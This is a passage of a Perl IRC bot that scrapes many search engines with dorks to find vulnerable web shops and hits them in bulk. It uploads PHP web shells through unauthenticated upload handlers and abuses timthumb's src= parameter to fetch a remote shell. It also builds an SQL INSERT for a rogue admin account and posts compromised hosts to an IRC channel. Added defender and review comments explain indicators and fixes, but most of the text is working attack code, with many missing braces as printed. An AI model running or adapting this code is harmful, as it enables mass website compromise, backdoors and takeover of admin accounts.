=> 'application/octet-stream']],'Content-Type' => 'form-data');

my $resb = $browser->post( $url,['products_image' => ['./byroe.jpg' => 'byroe.php'


=> 'application/octet-stream']],'Content-Type' => 'form-data');

my $resc = $browser->post( $url,['products_image' => ['./allnet.jpg' =>


'allnet.html' => 'application/octet-stream']],'Content-Type' => 'form-data');

my $hasil = $res->as_string;

my $hasil1 = $resa->as_string;

my $hasil2 = $resb->as_string;

my $hasil3 = $resc->as_string;

# Only the aspaltx.php response is kept; the other two GETs are fire-and-forget.
my $check = &get_content("http://".
$site."images/aspaltx.php");&get_content("http://".
$site."images/byroe.php");&get_content("http://".
$site."images/allnet.html");sleep(3);

if ($check =~ /JANCOK- exploit/) {

my $safe ="";

my $os ="";

my $free ="";

# Scrape status fields out of the returned page for the report line.
if ($check =~ m/Software : (.*?)<\/u><\/b><\/a><br>/) {$soft = $1;}

if ($check =~ m/SAFE MODE is (.*?)<\/b><\/font>/) {$safe = $1;}


if ($check =~ m/OS : (.*?)<br>/) {$os = $1;}

if ($check =~ m/Freespace : (.*?)<\/p><\/td><\/tr>/) {$free = $1;}

&msg("$chan","$oscologo(#4@#8$engine#15)#15(#4@#9SHeLL#15)#13 http://".
$site."images/#4aspaltx.php #9(#4@#15SafeMode= $safe#9)(#4@#15OS= $os#9)
(#4@#15FreeSpace= $free#9)");sleep(2);

&msg("$admin","$oscologo(#4@#8$engine#15)#15(#4@#9SHeLL#15)#13 http://".
$site."images/#4allnet.html #9(#4@#15SafeMode= $safe#9)(#4@#15OS= $os#9)
(#4@#15FreeSpace= $free#9)");sleep(2);

# osco2(chan, bug, dork, engine): same loop as osco(), but the trigger string
# is "TABLE_HEADING_FILENAME" and the follow-up is osco_xpl2().
# Defender note: the trigger is an untranslated language constant appearing in
# a page served to an anonymous GET, which indicates the admin script rendered
# without an authenticated session.
# NOTE(review): closing braces for the loop and outer `if` are missing in this
# listing. The line "$test);" below is the wrapped tail of the commented-out
# &msg call above it and is live code as printed here.
sub osco2() {

my $chan = $_[0];

my $bug = $_[1];

my $dork = $_[2];

my $engine = $_[3];

my $count = 0;

my @list = &search_engine($chan,$bug,$dork,$engine,$oscologo);

my $num = scalar(@list);

if ($num > 0) {

foreach my $site (@list) {

$count++;

# Announced at num-1, one iteration before the last host.
if ($count == $num-1) { &msg("$chan","$oscologo(#4@#8$engine#15)#10


Scan finish"); }

my $test = "http://".$site.$bug;

my $html = &get_content($test);

# Parent waits for the first child, which forks and exits; the grandchild
# runs the check below.
if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {

if ($html =~ /TABLE_HEADING_FILENAME/ ) {

# &msg("$chan","$oscologo(#4@#8$engine#15)#15(#4@#9System#15)#7 ".
$test);

&osco_xpl2($test,$chan,$site,$engine);

} else { }

# The sleep after `exit` can never run.
} exit; sleep(2); }

# osco_xpl2(url, chan, site, engine): variant of osco_xpl(). The POST target
# is `url` with "?action=processuploads" appended and the form field is
# "file_1"; the uploaded local files, remote names and follow-up GETs under
# "<site>images/" are the same.
# Defender note: requests to an upload handler with action=processuploads from
# a client without a session, followed by GETs for aspaltx.php, byroe.php and
# allnet.html under images/, identify this step in logs. The mitigations are
# the same as for the products_image variant: authenticate the handler,
# restrict extensions, and do not execute scripts from the upload directory.
# NOTE(review): the success check here is /JANCOK- exploits/ (with a trailing
# "s"), whereas osco_xpl() checks /JANCOK- exploit/. $soft is assigned without
# `my`; closing braces of the `if` and of the sub are missing in this listing.
sub osco_xpl2() {

my $browser = LWP::UserAgent->new;

my $url = $_[0]."?action=processuploads";

my $chan = $_[1];

my $site = $_[2];

my $engine = $_[3];

# [ local path => remote filename => content type ] form-upload triples.
my $res = $browser->post( $url,['file_1' => ['./ipays.jpg' => 'bronsx.php' =>


'application/octet-stream']],'Content-Type' => 'form-data');

my $resa = $browser->post( $url,['file_1' => ['./maza.jpg' => 'aspaltx.php' =>


'application/octet-stream']],'Content-Type' => 'form-data');

my $resb = $browser->post( $url,['file_1' => ['./byroe.jpg' => 'byroe.php' =>


'application/octet-stream']],'Content-Type' => 'form-data');

my $resc = $browser->post( $url,['file_1' => ['./allnet.jpg' => 'allnet.html' =>


'application/octet-stream']],'Content-Type' => 'form-data');

# The four as_string results are never read in the visible lines.
my $hasil = $res->as_string;

my $hasil1 = $resa->as_string;

my $hasil2 = $resb->as_string;

my $hasil3 = $resc->as_string;

# Only the aspaltx.php response is kept.
my $check = &get_content("http://".
$site."images/aspaltx.php");&get_content("http://".
$site."images/byroe.php");&get_content("http://".
$site."images/allnet.html");sleep(3);

if ($check =~ /JANCOK- exploits/) {

my $safe ="";

my $os ="";

my $free ="";

# Scrape status fields out of the returned page for the report line.
if ($check =~ m/Software : (.*?)<\/u><\/b><\/a><br>/) {$soft = $1;}

if ($check =~ m/SAFE MODE is (.*?)<\/b><\/font>/) {$safe = $1;}

if ($check =~ m/OS : (.*?)<br>/) {$os = $1;}

if ($check =~ m/Freespace : (.*?)<\/p><\/td><\/tr>/) {$free = $1;}

&msg("$chan","$oscologo(#4@#8$engine#15)#15(#4@#9SHeLL#15)#13 http://".
$site."images/#4aspaltx.php #9(#4@#15SafeMode= $safe#9)(#4@#15OS= $os#9)
(#4@#15FreeSpace= $free#9)");sleep(2);

&msg("$admin","$oscologo(#4@#8$engine#15)#15(#4@#9SHeLL#15)#13 http://".
$site."images/#4allnet.html #9(#4@#15SafeMode= $safe#9)(#4@#15OS= $os#9)
(#4@#15FreeSpace= $free#9)");sleep(2);

# loko(chan, bug, dork, engine): for every host from search_engine(), request
# "http://<host>filemanager/browser.html" and report the URL to the channel
# when the body matches the pattern in $loko_output. This is detection only;
# no upload is attempted in the visible lines.
# Defender note: a publicly reachable filemanager/browser.html is what is
# being enumerated. Removing the bundled file manager or placing it behind
# authentication takes the host out of these results.
# NOTE(review): $loko_output is defined outside this excerpt and is
# interpolated as a regex. $bug is only forwarded to search_engine(). Closing
# braces are missing in this listing.
sub loko() {

my $chan = $_[0];

my $bug = $_[1];

my $dork = $_[2];

my $engine = $_[3];

my $count = 0;

my @list = &search_engine($chan,$bug,$dork,$engine,$lokologo);

my $num = scalar(@list);

if ($num > 0) {

foreach my $site (@list) {

$count++;

# Announced at num-1, one iteration before the last host.
if ($count == $num-1) { &msg("$chan","$lokologo(#4@#8$engine#15)#10


Scan finish"); }

# $test and $vuln are built from the same fixed path.
my $test = "http://".$site."filemanager/browser.html";

my $vuln = "http://".$site."filemanager/browser.html";
my $re = &get_content($test);

if ($re =~ /$loko_output/){

&msg("$chan", "$lokologo(#4@#8$engine#15)(#4@#13VulN#15)#13 ".


$vuln."#15(#4@#0UPLOAD#15)#");

# op(chan, bug, dork, engine): for every host from search_engine(), request
# "http://<host>" followed by $open_test and report a fixed
# fckeditor connector test-page URL to the channel when the body matches
# $open_output. Detection only; nothing is uploaded in the visible lines.
# Defender note: the reported path is an editor's file-manager connector test
# page under admin/. Shipping that test page to production, reachable without
# a session, is the exposure being enumerated.
# NOTE(review): $open_test and $open_output are defined outside this excerpt;
# the reported $vuln path is hard-coded and is not derived from $open_test.
# Closing braces are missing in this listing.
sub op() {

my $chan = $_[0];

my $bug = $_[1];

my $dork = $_[2];

my $engine = $_[3];

my $count = 0;

my @list = &search_engine($chan,$bug,$dork,$engine,$oplogo);

my $num = scalar(@list);

if ($num > 0) {

foreach my $site (@list) {

$count++;
# Announced at num-1, one iteration before the last host.
if ($count == $num-1) { &msg("$chan","$oplogo(#4@#8$engine#15)#10 Scan
finish"); }

my $test = "http://".$site.$open_test;

my $vuln = "http://".
$site."admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html";

my $re = &get_content($test);

if ($re =~ /$open_output/){

&msg("$chan", "$oplogo(#4@#8$engine#15)(#4@#13VulN#15)#13 ".


$vuln."#15(#4@#0UPLOAD#15)#");

# zen(chan, bug, dork, engine): for every host from search_engine(), request
# "<site>images/#4brons.php" and report it to the channel when the body
# contains "JANCOK- exploit" (case-insensitive).
# NOTE(review): $test (an admin URL with action=insert) and $que (an SQL
# INSERT that adds an admin row) are built but never sent anywhere in the
# visible lines, so as printed this sub only checks for an already-present
# file. The "#4" inside $vuln looks like an IRC colour code that ended up in
# the URL that is actually requested - confirm. The line starting with $vuln
# near the end is the wrapped tail of the commented-out &msg call and is live
# code as printed here. Closing braces are missing in this listing.
# Defender note: the INSERT string names a fixed admin_id, admin_name and
# admin_email; an unexpected row with those values in a shop's admin table is
# an indicator that an earlier variant of this routine ran against it.
sub zen() {

my $chan = $_[0];

my $bug = $_[1];

my $dork = $_[2];

my $engine = $_[3];

my $count = 0;

my @list = &search_engine($chan,$bug,$dork,$engine,$zenlogo);

my $num = scalar(@list);
if ($num > 0) {

foreach my $site (@list) {

$count++;

# Announced at num-1, one iteration before the last host.
if ($count == $num-1) { &msg("$chan","$zenlogo(#4@#8$engine#15)#10 Scan


finish"); }

my $test = "http://".
$site."admin/record_company.php/password_forgotten.php?action=insert";

my $vuln = "http://".$site."images/#4brons.php";

my $que = "INSERT INTO admin (admin_id, admin_name, admin_email,


admin_pass) VALUES
(56,'adminsys','admin@mazacrew.co.cc','617ec22fbb8f201c366e9848c0eb6925:87');";

# Only $vuln is requested; $test and $que are unused below.
my $re = &get_content($vuln);

if ($re =~ /JANCOK- exploit/i){

&msg("$chan", "$zenlogo(#4@#8$engine#15)(#4@#13Shell#15)#13 ".


$vuln."#");

else{

# &msg("$chan", "$zenlogo(#4@#8$engine#15)(#4@#13GaGaL#15)#4 ".


$vuln."#15(#4@#9Ab0rteD#15)#");

}
######################################### ADDED

# thumb(chan, bug, dork, engine): for every host from search_engine(), request
# "<site><bug>timthumb.php?src=<$thumbshell>", then request two fixed
# hash-named .php paths under cache/ and temp/, and report the cache/ URL to
# the channel when the first response contains "tripl3k was Here".
# Defender note: in access logs this is a timthumb.php request whose src=
# parameter points at an external host, followed by GETs for a 32-hex-digit
# .php name under cache/ or temp/. A thumbnailer that fetches remote URLs and
# stores them with an executable extension is the precondition; restricting
# src to local files and denying script execution in the cache directory
# remove it.
# NOTE(review): $ceck1/$ceck2 are built as $bug followed by the literal string
# ".$aa" / ".$ab", which puts a "." in front of cache/ and temp/ in the URL.
# $loco1 and $loco2 are fetched but never read. Closing braces are missing in
# this listing.
sub thumb() {

my $chan = $_[0];

my $bug = $_[1];

my $dork = $_[2];

my $engine = $_[3];

my $count = 0;

my @list = &search_engine($chan,$bug,$dork,$engine,$thumblogo);

my $num = scalar(@list);

if ($num > 0) {

foreach my $site (@list) {

$count++;

# Announced at num-1, one iteration before the last host.
if ($count == $num-1) { &msg("$chan","$thumblogo(#4@#9$engine#15)#10 Scan finish");


}

# $thumbshell is a file-level variable holding the remote URL passed as src=.
my $coba = "http://".$site.$bug."timthumb.php?src=".$thumbshell."";

my $cek = &get_content($coba);sleep(1);

my $aa = "cache/c54af1d13e884a4c63da8f3098a7a4da.php";

my $ab = "temp/c54af1d13e884a4c63da8f3098a7a4da.php";

my $ceck1 = "http://".$site.$bug.".$aa";
my $ceck2 = "http://".$site.$bug.".$ab";

my $loco1 = &get_content($ceck1);sleep(1);

my $loco2 = &get_content($ceck2);sleep(1);

# The decision is made on the timthumb response, not on the two checks above.
if ($cek =~ /tripl3k was Here/i) {

my $vuln = "http://".$site.
$bug."cache/c54af1d13e884a4c63da8f3098a7a4da.php";

&msg("$chan", "$thumblogo(#4@#8$engine#15)(#4@#4VulN#15)#4 ".$vuln." #15(#4@#9


0WN3D #15)#");

#########################################

# search_engine(chan, bug, dork, engine, logo): dispatch on the exact,
# case-sensitive engine label to the matching scraper sub, pass the combined
# results through &clean, post the total/clean counts to the channel, and
# return the cleaned list.
# Only one label can match per call, so @total holds the output of at most one
# scraper. An unrecognised label yields an empty list.
# Defender note: this is the target-selection stage. The hosts a site operator
# later sees probed were harvested from public search results for the dork,
# so keeping installer, test and admin pages out of search indexes reduces
# exposure to this kind of sweep but does not replace patching.
# NOTE(review): &clean and the scraper subs for some labels are defined
# outside this excerpt; $bug is accepted but not used here. The closing brace
# of the sub is missing in this listing.
sub search_engine() {

my (@total,@clean);

my $chan = $_[0];

my $bug = $_[1];
my $dork = $_[2];

my $engine = $_[3];

my $logo = $_[4];

if ($engine eq "GooGLe") { my @google = &google($dork); push(@total,@google); }

if ($engine eq "ReDiff") { my @rediff = &rediff($dork); push(@total,@rediff); }

if ($engine eq "Bing") { my @bing = &bing($dork); push(@total,@bing); }

if ($engine eq "ALtaViSTa") { my @altavista = &altavista($dork);


push(@total,@altavista); }

if ($engine eq "YahOo") { my @yahoo = &yahoo($dork); push(@total,@yahoo); }

if ($engine eq "AsK") { my @ask = &ask($dork); push(@total,@ask); }

if ($engine eq "UoL") { my @uol = &uol($dork); push(@total,@uol); }

if ($engine eq "CluSty") { my @clusty = &clusty($dork); push(@total,@clusty); }

if ($engine eq "GutSer") { my @gutser = &gutser($dork); push(@total,@gutser); }

if ($engine eq "GooGle2") { my @google2 = &google2($dork);


push(@total,@google2); }

if ($engine eq "ExaLead") { my @exalead = &exalead($dork);


push(@total,@exalead); }

if ($engine eq "LyCos") { my @lycos = &lycos($dork); push(@total,@lycos); }

if ($engine eq "VirgiLio") { my @virgilio = &virgilio($dork);


push(@total,@virgilio); }

if ($engine eq "WebDe") { my @webde = &webde($dork); push(@total,@webde); }

if ($engine eq "HotBot") { my @hotbot = &hotbot($dork); push(@total,@hotbot); }


if ($engine eq "AoL") { my @aol = &aol($dork); push(@total,@aol); }

if ($engine eq "SaPo") { my @sapo = &sapo($dork); push(@total,@sapo); }

if ($engine eq "DuCk") { my @duck = &duck($dork); push(@total,@duck); }

if ($engine eq "LyGo") { my @lygo = &lygo($dork); push(@total,@lygo); }

if ($engine eq "YauSe") { my @yause = &yause($dork); push(@total,@yause); }

if ($engine eq "BaiDu") { my @baidu = &baidu($dork); push(@total,@baidu); }

if ($engine eq "KiPoT") { my @kipot = &kipot($dork); push(@total,@kipot); }

if ($engine eq "GiBLa") { my @gibla = &gibla($dork); push(@total,@gibla); }

if ($engine eq "BLacK") { my @black = &black($dork); push(@total,@black); }

if ($engine eq "oNeT") { my @onet = &onet($dork); push(@total,@onet); }

if ($engine eq "SiZuka") { my @sizuka = &sizuka($dork); push(@total,@sizuka); }

if ($engine eq "WaLLa") { my @walla = &walla($dork); push(@total,@walla); }

if ($engine eq "DeMos") { my @demos = &demos($dork); push(@total,@demos); }

if ($engine eq "RoSe") { my @rose = &rose($dork); push(@total,@rose); }

if ($engine eq "SeZnaM") { my @seznam = &seznam($dork); push(@total,@seznam); }

if ($engine eq "TisCali") { my @tiscali = &tiscali($dork);


push(@total,@tiscali); }

if ($engine eq "NaVeR") { my @naver = &naver($dork); push(@total,@naver); }

# &clean is defined elsewhere; presumably it de-duplicates - confirm.
@clean = &clean(@total);

&msg("$chan","$logo(#4@#8$engine#15)#4 Total:#0 (".scalar(@total).")#4 Clean:#0


(".scalar(@clean).")#");
return @clean;

#########################################

# isFound(link, reqexp): fetch `link` with get_content() and return 1 when the
# body matches `reqexp`, otherwise 0.
# NOTE(review): `reqexp` is interpolated into the match as a regular
# expression, not as a literal string, so regex metacharacters in it are
# active. The closing brace of the sub is missing in this listing.
sub isFound() {

my $status = 0;

my $link = $_[0];

my $reqexp = $_[1];

my $res = &get_content($link);

if ($res =~ /$reqexp/) { $status = 1 }

return $status;

# get_content(url): GET `url` with a 7-second timeout and return the response
# body. The body is returned regardless of HTTP status; callers tell success
# from failure only by matching strings in it.
# NOTE(review): $uagent is not declared in this sub; it is presumably chosen
# from the @uagents list at the top of the file - confirm. Because the user
# agent imitates old browsers, these requests do not stand out by user agent
# alone; the request paths and parameters are the more reliable signal. The
# closing brace of the sub is missing in this listing.
sub get_content() {

my $url = $_[0];

my $ua = LWP::UserAgent->new(agent => $uagent);

$ua->timeout(7);

my $req = HTTP::Request->new(GET => $url);

my $res = $ua->request($req);
return $res->content;

######################################### SEARCH ENGINE gibla

# google(key): page through Google result pages for the encoded dork
# (start = 0..400 in steps of 10), capture the text after "http://" in each
# result anchor, skip captures containing "google", expand each capture with
# &links and return the collected list.
# NOTE(review): &key, &search_engine_query and &links are defined outside this
# excerpt. The line break inside the URL string is part of the string as
# printed. Some closing braces are missing in this listing.
sub google() {

my @list;

my $key = $_[0];

for (my $i=0; $i<=400; $i+=10){

my $search = ("http://www.google.com/search?
q=".&key($key)."&num=100&filter=0&start=".$i);

my $res = &search_engine_query($search);

while ($res =~ m/<a href=\"?http:\/\/([^>\"]*)\//g) {

# Drop the search engine's own links.
if ($1 !~ /google/){

my $link = $1;

my @grep = &links($link);

push(@list,@grep);

}
return @list;

# rediff(key): page through Rediff directory search results (firstres =
# 0..500 in steps of 10), capture the URL text after "http://" from anchors
# followed by onmousedown, skip rediff.com captures, expand with &links and
# return the list.
# Paging stops early by forcing $i to 500 when the page does not link to the
# current offset.
# NOTE(review): $b is assigned without `my`, so this writes the package
# variable $b. Some closing braces are missing in this listing.
sub rediff() {

my @list;

my $key = $_[0];

for (my $i=0; $i<=500; $i+=10) {

my $search = ("http://search1.rediff.com/dirsrch/default.asp?
MT=".&key($key)."&iss=&submit=Search&firstres=".$i);

$b = "$i";

my $res = &search_engine_query($search);

# No link for this offset means there are no further pages.
if ($res !~ /firstres=$b\'>/) {$i=500;}

while ($res =~ m/<a href=\"http:\/\/(.*?)\" onmousedown/g) {

if ($1 !~ /rediff\.com/){

my $link = $1;

my @grep = &links($link);

push(@list,@grep);

return @list;
}

# uol(key): page through UOL search results (start = 1..491 in steps of 10),
# capture the text after "http://" in each anchor, skip uol.com captures,
# expand with &links and return the list.
# Paging stops early when the "next" marker span is absent from the page.
# NOTE(review): some closing braces are missing in this listing.
sub uol() {

my @list;

my $key = $_[0];

for (my $i=1; $i<=500; $i+=10) {

my $search = ("http://mundo.busca.uol.com.br/buscar.html?
q=".&key($key)."&start=".$i);

my $res = &search_engine_query($search);

# Force the loop to end when there is no next-page marker.
if ($res !~ m/<span class=\"next\">pr&#243;xima<\/span>/){$i=500;}

while ($res =~ m/<a href=\"http:\/\/([^>\"]*)/g) {

if ($1 !~ /uol\.com/) {

my $link = $1;

my @grep = &links($link);

push(@list,@grep);

return @list;

}
# bing(key): page through Bing results (first = 1..491 in steps of 10),
# capture the text after "http://" in each anchor, skip bing.com captures,
# expand with &links and return the list.
# Paging stops early when the page contains "Ref A:", "Ref B:" and "Ref C:"
# together, which this code treats as an error/blocked page.
# NOTE(review): some closing braces are missing in this listing.
sub bing() {

my @list;

my $key = $_[0];

for (my $i=1; $i<=500; $i+=10) {

my $search = ("http://www.bing.com/search?
q=".&key($key)."&filt=all&first=".$i."&FORM=PERE");

my $res = &search_engine_query($search);

# All three reference lines present: stop paging.
if ($res =~ m/Ref A:/g && $res =~ m/Ref B:/g && $res =~ m/Ref C:/g) {$i=500;}

while ($res =~ m/<a href=\"?http:\/\/([^>\"]*)\//g) {

if ($1 !~ /bing\.com/) {

my $link = $1;

my @grep = &links($link);

push(@list,@grep);

return @list;

}
# altavista(key): page through AltaVista (Italian front end) results
# (stq = 1..491 in steps of 10), capture the text of each "ngrn" span up to
# the first "/", skip captures containing "altavista", strip "<" and spaces
# from the capture, expand with &links and return the list.
# Paging stops early when the "Succ" next-page link is absent.
# NOTE(review): some closing braces are missing in this listing.
sub altavista() {

my @list;

my $key = $_[0];

for (my $i=1; $i<=500; $i+=10){

my $search = ("http://it.altavista.com/web/results?
itag=ody&kgs=0&kls=0&dis=1&q=".&key($key)."&stq=".$i);

my $res = &search_engine_query($search);

# No next-page link: stop paging.
if ($res !~ /target=\"_self\">Succ/) {$i=500;}

while ($res =~ m/<span class=ngrn>(.+?)\//g) {

if ($1 !~ /altavista/){

my $link = $1;

# Remove leftover markup characters and spaces from the captured host.
$link =~ s/<//g;

$link =~ s/ //g;

my @grep = &links($link);

push(@list,@grep);

return @list;

}
# ask(key): page through Ask (Italian front end) results (page = 1..50),
# capture the URL text after "http://" from anchors followed by onmousedown,
# skip ask.com captures, expand with &links and return the list.
# Paging stops early when "Successiva" (the next-page label) is absent.
# NOTE(review): closing braces are missing in this listing.
sub ask() {

my @list;

my $key = $_[0];

for (my $i=1; $i<=50; $i+=1) {

my $search = ("http://it.ask.com/web?
q=".&key($key)."&qsrc=0&o=0&l=dir&qid=EE90DE6E8F5370F363A63EC61228D4FE&page=".
$i."&jss=1&dm=all");

my $res = &search_engine_query($search);

# No next-page label: stop paging.
if ($res !~ /Successiva/) {$i=50;}

while ($res =~ m/href=\"http:\/\/(.+?)\" onmousedown=\"/g) {

if ($1 !~ /ask\.com/){

my $link = $1;

my @grep = &links($link);

push(@list,@grep);

return @list;

# yahoo(key): page through Yahoo results (b = 1..491 in steps of 10), capture
# the text after the URL-encoded "http%3a//" up to the next double quote, skip
# yahoo.com captures, expand with &links and return the list.
# NOTE(review): closing braces are missing in this listing.
sub yahoo(){
my @list;

my $key = $_[0];

my $b = 0;

for ($b=1; $b<=500; $b+=10) {

my $search = ("http://search.yahoo.com/search?p=".&key($key)."&b=".$b);

my $res = &search_engine_query($search);

# Result links are matched in their percent-encoded redirect form.
while ($res =~ m/http\%3a\/\/(.+?)\"/g) {

if ($1 !~ /yahoo\.com/){

my $link = $1;

my @grep = &links($link);

push(@list,@grep);

return @list;

# clusty(key): page through yippy.com results (offset 10..500 in steps of 10),
# capture the URL text after "http://" from document-header anchors, skip
# yippy.com captures, expand with &links and return the list.
# Paging stops early when the page does not contain "next".
# NOTE(review): the URL string and the result regex both contain line breaks
# as printed here, which are part of the string/pattern. Closing braces are
# missing in this listing.
sub clusty() {

my @list;
my $key = $_[0];

my $b = 0;

for ($b=10; $b<=500; $b+=10) {

my $search = ("http://search.yippy.com/search?query=".&key($key)."&input-
form=clusty-simple&v:sources=webplus&v:state=root|root-".$b."-10|0&");

my $res = &search_engine_query($search);

# No "next" on the page: stop paging.
if ($res !~ /next/) {$b=500;}

while ($res =~ m/<div class=\"document-header\"><a


href=\"http:\/\/(.*?)\"><span class=\"title\">/g) {

if ($1 !~ /yippy\.com/){

my $link = $1;

my @grep = &links($link);

push(@list,@grep);

return @list;

# gutser(key): page through goodsearch.com results (page = 1..50), capture the
# text after "http://" up to the closing quote of each link, skip captures
# that match goodsearch, good.is, w3.org or quantserve, expand with &links and
# return the list.
# NOTE(review): $b is used without `my` here, so the loop counter is the
# package variable $b. Closing braces are missing in this listing.
sub gutser() {

my @list;
my $key = $_[0];

for ($b=1; $b<=50; $b+=1) {

my $search = ("http://www.goodsearch.com/Search.aspx?
Keywords=".&key($key)."&page=".$b."&osmax=0");

my $res = &search_engine_query($search);

while ($res =~ m/http:\/\/([^>\"]*)\">/g) {

# Drop the engine's own links and common third-party assets.
if ($1 !~ /goodsearch|good\.is|w3\.org|quantserve/){

my $link = $1;

my @grep = &links($link);

push(@list,@grep);

return @list;

# google2(key): like google(), but queries country-specific Google domains.
# For each entry in @doms it picks a RANDOM entry of @doms (the loop variable
# $domain itself is not used), pages through results (start = 1..191 in steps
# of 10), captures the text after "http://" in each anchor, skips captures
# containing "google", expands with &links and returns the list.
# NOTE(review): $dom is assigned without `my`. Several @doms entries are split
# by a line break inside the quoted string as printed here, so those entries
# contain a newline. Some closing braces are missing in this listing.
sub google2() {

my @list;

my $key = $_[0];

my $b = 0;

my @doms =
("ae","com.af","com.ag","off.ai","am","com.ar","as","at","com.au","az","ba","com.bd
","be","bg","bi","com.bo","com.br","bs","co.bw","com.bz","ca","cd","cg","ch","ci","
co.ck","cl","com.co","co.cr","com.cu","de","dj","dk","dm","com.do","com.ec","es","c
om.et","fi","com.fj","fm","fr","gg","com.gi","gl","gm","gr","com.gt","com.hk","hn",
"hr","co.hu","co.id","ie","co.il","co.im","co.in","is","it","co.je","com.jm","jo","
co.jp","co.ke","kg","co.kr","kz","li","lk","co.ls","lt","lu","lv","com.ly","mn","ms
","com.mt","mu","mw","com.mx","com.my","com.na","com.nf","com.ni","nl","no","com.np
","nr","nu","co.nz","com.om","com.pa","com.pe","com.ph","com.pk","pl","pn","com.pr"
,"pt","com.py","ro","ru","rw","com.sa","com.sb","sc","se","com.sg","sh","sk","sn","
sm","com.sv","co.th","com.tj","tm","to","tp","com.tr","tt","com.tw","com.ua","co.ug
","co.uk","com.uy","uz","com.vc","co.ve","vg","co.vi","com.vn","vu","ws","co.za","c
o.zm");

# One random domain is drawn per iteration; domains can repeat or be skipped.
foreach my $domain (@doms) { $dom = $doms[rand(scalar(@doms))];

for ($b=1; $b<=200; $b+=10) {

my $search = ("http://www.google.".$dom."/search?
num=50&q=".&key($key)."&start=".$b."&sa=N");

my $res = &search_engine_query($search);

while ($res =~ m/<a href=\"?http:\/\/([^>\"]*)\//g) {

if ($1 !~ /google/){

my $link = $1;

my @grep = &links($link);

push(@list,@grep);

} return @list;

}
# exalead(key): page through exalead.com results (start_index = 0..1000 in
# steps of 100), capture the URL text after "http://" from thumbnail anchors,
# skip captures containing "exalead", expand with &links and return the list.
# NOTE(review): paging is stopped when the "topNextUrl" span IS present, which
# is the opposite sense of the next-page checks in the sibling scrapers -
# confirm intent. $b is the package variable here (no `my`). Closing braces
# are missing in this listing.
sub exalead() {

my @list;

my $key = $_[0];

for ($b=0; $b<=1000; $b+=100) {

my $search = ("http://www.exalead.com/search/web/results/?
q=".&key($key)."&elements_per_page=100&start_index=".$b);

my $res = &search_engine_query($search);

if ($res =~ m/<span id=\"topNextUrl\">/g) {$b=1000;}

while ($res =~ m/<a class=\"thumbnail\" href=\"http:\/\/(.*?)\"/g) {

my $link = $1;

if ($link!~ /exalead/){

my @grep = &links($link);

push(@list,@grep);

return @list;

# lycos(key): page through search.lycos.com results (page2 = 0..50), capture
# the URL text after "http://" from anchors followed by onmouseover, skip
# lycos.com captures, expand with &links and return the list.
# NOTE(review): $b is the package variable here (no `my`). Closing braces are
# missing in this listing.
sub lycos() {
my @list;

my $key = $_[0];

for ($b=0; $b<=50; $b+=1) {

my $search = ("http://search.lycos.com/?query=".&key($key)."&page2=".
$b."&tab=web&searchArea=web&diktfc=468007302EF7DB9AFE53D4138B848E7B4000D424385F");

my $res = &search_engine_query($search);

while ($res =~ m/href=\"http:\/\/(.+?)\" onmouseover=/g) {

if ($1 !~ /lycos\.com/){

my $link = $1;

my @grep = &links($link);

push(@list,@grep);

return @list;

# virgilio(key): page through ricerca.virgilio.it results (offset = 10..500 in
# steps of 10), capture the URL text after "http://" from anchors with a
# target attribute, skip .virgilio.it captures, expand with &links and return
# the list.
# Paging stops early on the "no results" message or on the message the site
# shows for automated-looking request volume.
# NOTE(review): $b is the package variable here (no `my`). Closing braces are
# missing in this listing.
sub virgilio() {

my @list;

my $key = $_[0];

for ($b=10; $b<=500; $b+=10) {


my $search = ("http://ricerca.virgilio.it/ricerca?
qs=".&key($key)."&filter=1&site=&lr=&hits=10&offset=".$b);

my $res = &search_engine_query($search);

# "No results" page: stop paging.
if ($res =~ m/non ha prodotto risultati/i) {$b=500;}

# Rate-limit / abuse notice: stop paging.
if ($res =~ m/riconducibile a richieste effettuate/i) {$b=500;}

while ($res =~ m/<a href=\"http:\/\/(.+?)\" target=\"/g) {

if ($1 !~ /\.virgilio\.it/){

my $link = $1;

my @grep = &links($link);

push(@list,@grep);

return @list;

# webde(key): page through suche.web.de results (pageIndex = 1..50), capture
# the text after "http://" inside each "url" span, skip captures containing
# "suche" or "web", expand with &links and return the list.
# Paging stops early on the "search term not found" message.
# NOTE(review): the exclusion /suche|web/ also drops any result whose URL
# merely contains "web". $b is the package variable here (no `my`). Closing
# braces are missing in this listing.
sub webde() {

my @list;

my $key = $_[0];

for ($b=1; $b<=50; $b+=1) {


my $search = ("http://suche.web.de/search/web/?pageIndex=".
$b."&su=".&key($key)."&search=Suche&webRb=countryDE");

my $res = &search_engine_query($search);

# "Not found" page: stop paging.
if ($res =~ m/Suchbegriff nicht gefunden/i) {$b=50;}

while ($res =~ m/<span class=\"url\">http:\/\/(.*?)<\/span>/g) {

my $link = $1;

if ($link!~ /suche|web/){

my @grep = &links($link);

push(@list,@grep);

return @list;

# hotbot(key): page through hotbot.com results (page = 0..50, provider msn),
# capture the URL text after "http://" from rel="nofollow" anchors, skip
# hotbot.com captures, expand with &links and return the list.
# Paging stops early on the "had no web result" message.
# NOTE(review): $b is the package variable here (no `my`). Closing braces are
# missing in this listing.
sub hotbot() {

my @list;

my $key = $_[0];

for ($b=0; $b<=50; $b+=1) {

my $search = ("http://www.hotbot.com/?
query=".&key($key)."&ps=&loc=searchbox&tab=web&mode=search&currProv=msn&page=".
$b."&diktfc=51964BFDE35DFB6914F9E1E0D7988C3AC0ACB52B58BE");
my $res = &search_engine_query($search);

# "No results" page: stop paging.
if ($res =~ m/had no web result/i) {$b=50;}

while ($res =~ m/rel=\"nofollow\" href=\"http:\/\/(.+?)\"/g) {

if ($1 !~ /hotbot\.com/){

my $link = $1;

my @grep = &links($link);

push(@list,@grep);

return @list;

# aol(key): page through aim.search.aol.com results (page = 2..50), capture
# the URL text after "http://" from anchors followed by a property attribute,
# skip aol.com captures, expand with &links and return the list.
# NOTE(review): paging starts at page 2, so the first result page is never
# requested. $b is the package variable here (no `my`). Closing braces are
# missing in this listing.
sub aol() {

my @list;

my $key = $_[0];

for ($b=2; $b<=50; $b+=1) {

my $search = ("http://aim.search.aol.com/aol/search?
q=".&key($key)."&page=".$b);

my $res = &search_engine_query($search);
while ($res =~ m/href=\"http:\/\/(.*?)\" property/g) {

if ($1 !~ /aol\.com/){

my $link = $1;

my @grep = &links($link);

push(@list,@grep);

return @list;

# sapo(key): page through pesquisa.sapo.pt results (page = 1..50), capture the
# URL text after "http://" in each anchor, skip .sapo.pt captures, expand with
# &links and return the list.
# Paging stops early when the page does not contain "Next" (case-insensitive).
